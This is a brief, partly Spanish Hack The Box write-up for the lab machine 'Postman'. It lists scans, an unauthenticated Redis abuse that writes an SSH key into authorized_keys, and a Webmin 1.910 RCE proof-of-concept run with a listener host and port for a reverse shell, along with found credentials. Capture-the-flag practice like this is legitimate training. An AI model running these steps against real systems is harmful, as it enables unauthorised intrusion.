Postman

Postman


HTB Linux

nmap -A -p- -oA output 10.129.2.1 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA postman 10.129.2.1

nmap -sU -O -p- -oA postman-udp 10.129.2.1

nikto -h 10.129.2.1:80

ssh_command.

ssh_command.

redis-cli -h 10.129.2.1

config get dir

config set dir “/etc/”

config set dir “/var/lib/redis”

ssh_command.

http://10.129.2.1/js

ssh_command.

https://10.129.2.1:10000

ssh_command.

Vemos un webmin login. Pero sin credenciales es imposible.

ssh_command.

searchsploit webmin

ssh_command.

wfuzz -c —hc=404 -w /SecLists/Discovery/Web-Content/IIS.fuzz.txt http://10.129.2.1/FUZZ

ssh_command.

http://10.129.2.1/upload

ssh_command.

openssl s_client -connect 10.129.2.1:10000

ssh_command.

Encontramos un correo root@Postman

ssh_command.

config set dir “/var/lib/redis.ssh”

config set dbfilename authorized_keys

ssh-keygen

Esto no me funciono.

ssh_command.

https://github.com/NaveenNguyen/Webmin-1.910-Package-Updates-RCE/blob/master/exploit_poc.py

redis-cli -h 10.129.2.1

config set dbfilename authorized_keys

save

cat key | redis-cli -h 10.129.2.1 -x set 1

ssh_command.

python3 exploit_poc.py —ip_address=10.129.2.1 —port=10000 —lhost=10.10.14.135 —lport=443 —user=Matt —pass=computer2008

ssh_command.

whoami

ssh_command.

© 2025 Cu3rv0x